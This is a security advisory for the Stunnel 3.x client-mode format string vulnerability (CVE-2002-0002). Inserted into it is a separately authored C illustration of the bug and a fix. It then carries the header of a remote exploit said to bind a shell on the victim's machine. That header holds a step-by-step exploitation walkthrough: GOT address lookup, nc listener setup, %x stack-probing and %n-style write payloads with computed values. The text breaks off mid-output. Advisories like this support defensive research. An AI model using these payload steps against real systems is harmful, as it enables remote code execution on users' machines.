Security Research

Security Vulnerabilities
Stunnel Client Protocol Negotiation Format String Overflow Vulnerability

Published: 2003-01-15
Updated: 2003-01-22

Affected systems:
Stunnel Stunnel 3.19
Stunnel Stunnel 3.18
Stunnel Stunnel 3.17
Stunnel Stunnel 3.16
Stunnel Stunnel 3.15
Stunnel Stunnel 3.21
    - Mandrake Linux 8.1
    - RedHat Linux 7.3 ia64
    - RedHat Linux 7.3 x86
Unaffected systems:
Stunnel Stunnel 3.22
Description:
BUGTRAQ  ID: 3748
CVE(CAN) ID: CVE-2002-0002

Stunnel is a program that lets users encrypt arbitrary TCP sessions, enabling applications and services that are not SSL-aware to use SSL encryption.

Stunnel does not properly handle input received from the remote end. A remote attacker can exploit this by delivering a request containing a malicious format string to Stunnel, potentially executing arbitrary instructions on the system with the privileges of the Stunnel process.

If the user runs Stunnel on the client side with the '-n smtp', '-n pop' or '-n nntp' option, insufficient checking of the input allows an attacker to mount a format string attack: carefully crafted format string data can overwrite arbitrary stack contents and execute arbitrary instructions on the system with the privileges of the Stunnel process.
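As an added illustration (not code from this advisory or from the Stunnel project), the C below models the client-side negotiation bug described above: a printf-style logger that receives the server's line as its format string, the hardened form that passes the line behind a fixed "%s", and a check that counts conversion directives in a received banner. The function names and the sample banner text are constructed for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for a printf-style logger: whatever arrives as `fmt` is parsed. */
static void log_msg(char *out, size_t outlen, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
}

/* Vulnerable pattern (modelled on the advisory, not Stunnel's own code): the
 * line received from the server during '-n smtp/pop/nntp' negotiation is
 * handed to the logger AS the format string, so server-sent '%' directives
 * are interpreted with whatever happens to be on the stack as arguments. */
static void negotiate_vulnerable(char *out, size_t outlen, const char *line) {
    log_msg(out, outlen, line);
}

/* Hardened form: the server line is passed as data behind a fixed "%s"
 * format, so it is copied verbatim and never parsed. */
static void negotiate_fixed(char *out, size_t outlen, const char *line) {
    log_msg(out, outlen, "%s", line);
}

/* Demonstration helper: 1 if logging `line` produces exactly `expected`. */
static int logged_equals(int hardened, const char *line, const char *expected) {
    char out[128];
    if (hardened) negotiate_fixed(out, sizeof out, line);
    else          negotiate_vulnerable(out, sizeof out, line);
    return strcmp(out, expected) == 0;
}

/* Detection check for a proxy or test harness: count '%' conversion
 * directives (a '%' not escaped as "%%") in a server greeting. A genuine
 * SMTP/POP/NNTP banner contains none, so a non-zero count merits an alert. */
static int count_format_directives(const char *line) {
    int n = 0;
    for (const char *p = line; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }  /* literal percent sign */
        n++;
    }
    return n;
}
```

Only the harmless "%%" case is exercised through the vulnerable path (it collapses to a single "%", proving the server text was parsed as a format); feeding real conversion directives into it is undefined behaviour, which is exactly the defect.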

<*Source: Brian Hatch (bugtraq@ifokr.org)

  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=100949147823368&w=2
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

/*
* Stunnel < 3.22 remote exploit
* by ^sq/w00nf - deltha [at] analog.ro
* Contact: deltha@analog.ro
* Webpage: http://www.w00nf.org/^sq/
*
* ey ./w00nf-stunnel contribs - kewlthanx :
* nesectio, wsxz, soletario, spacewalker, robin, luckyboy, hash, nobody, ac1d, and not @ the end: bajkero
*
* You also need netcat and format strings build utility (from my webpage)
* Compile: gcc -w -o w00nf-stunnel w00nf-stunnel.c
*
*   .   .  .. ......................................... ...
*  .                         ____  ____        _____        :.:.:
*  :               _      __/ __ \/ __ \____  / __/           :..
*  :..            | | /| / / / / / / / / __ \/ /_               :
*  ..:..          | |/ |/ / /_/ / /_/ / / / / __/               :
*  :.: :..        |__/|__/\____/\____/_/ /_/_/                  .
*  : :   :..
*  :.: :............................................... ..  .   .
*                           T . E . A . M      
*
* POC - Tested remotely on linux
* Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL
* Visit http://www.stunnel.org for details
*
* I didn't add a search function or bruteforce attack because the vulnerability doesn't allow you
* to grab the remote stack.
*
* Description of this exploit:
* This exploit puts a payload on a specified port. When a remote user connects to your machine
* using stunnel on the specified port, the exploit executes this payload and binds a shell to the
* remote user's machine on port 5074.
*
* Summary:
* Malicious servers could potentially run code as the owner of a Stunnel process when using
* Stunnel's protocol negotiation feature in client mode.
*
* Description of vulnerability:
* Stunnel is an SSL wrapper able to act as an SSL client or server,
* enabling non-SSL aware applications and servers to utilize SSL encryption.
* In addition, Stunnel has the ability to perform as a simple SSL encryption/decryption
* engine. Stunnel can negotiate SSL with several other protocols, such as
* SMTP's "STARTTLS" option, using the '-n protocolname' flag. Doing so
* requires that Stunnel watches the initial protocol handshake before
* beginning the SSL session.
* There are format string bugs in each of the smtp, pop, and nntp
* client negotiations as supplied with Stunnel versions 3.3 up to 3.21c.
*
* No exploit is currently known, but the bugs are most likely exploitable.
*
* Impact:
* If you use Stunnel with the '-n smtp', '-n pop', '-n nntp' options
* in client mode ('-c'), a malicious server could abuse the format
* string bug to run arbitrary code as the owner of the Stunnel
* process. The user that runs Stunnel depends on how you start
* Stunnel. It may or may not be root -- you will need to check
* how you invoke Stunnel to be sure.
* There is no vulnerability unless you are invoking Stunnel with
* the '-n smtp', '-n pop', or '-n nntp' options in client mode.
* There are no format string bugs in Stunnel when it is running as an SSL
* server.
*
* Mitigating factors:
* If you start Stunnel as root but have it change userid to some other
* user using the '-s username' option, the Stunnel process will be
* running as 'username' instead of root when this bug is triggered.
* If this is the case, the attacker can still trick your Stunnel process
* into running code as 'username', but not as root.
* Where possible, we suggest running Stunnel as a non-root user, either
* using the '-s' option or starting it as a non-privileged user.
*
* Triggering this vulnerability - example for kidz:
* Obtain a shell account on to-be-hacked's server and perform the following commands:
* sq@cal013102: whereis stunnel
* stunnel: /usr/sbin/stunnel
* change directory to where is stunnel
* Obtain vsnprintf's R_386_JUMP_SLOT:
* sq@cal013102:~/stunnel-3.20$ /usr/bin/objdump --dynamic-reloc ./stunnel |grep printf
* 08053470 R_386_JUMP_SLOT   fprintf
* ---->080534a8 R_386_JUMP_SLOT   vsnprintf
* 080535a4 R_386_JUMP_SLOT   snprintf
* 08053620 R_386_JUMP_SLOT   sprintf
* open 2 terminals
* in the first terminal make netcat connect to a port (eg 252525)
* sq@cal013102:~/stunnel-3.20$ nc -p 252525 -l
* in the second terminal (remote) simulate attack
* ./stunnel -c -n smtp -r localhost:252525
* in the first terminal with nc insert a specially crafted string to grep eatstack value
* AAAABBBB%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|
* in the second terminal (remote) it will return the stack values and see at which position
* 41414141 and 424242 appeared
* AAAABBBB|bffff868|bffffb60|bffffece|bffffed3|80503ae|40275580|4016bfc4|
* 4027f3c4|41414141|42424242|257c7825|78257c78|7c78257c|
* 257c7825|78257c78|7c78257c| ->414141=9 and 424242=10
* try again with to see if eatstack value is 9 AAAABBBB%9$x%10$x and it will return AAAABBBB4141414142424242
* put the address obtained with objdump in hex little endian format \xa8\x34\x05\x08 and last value +2 \xaa\x34\x05\x08
* (a8+2=aa) and generate the decimal value of format string after you got the middle of nops value on stack 0xbffff89b
* with build, a program attached to this exploit.
* ./build 080534a8 0xbffff89b 9
* adr : 134558888 (80534a8)
* val : -1073743717 (bffff89b)
* valh: 49151 (bfff)
* vall: 63643 (f89b)
* [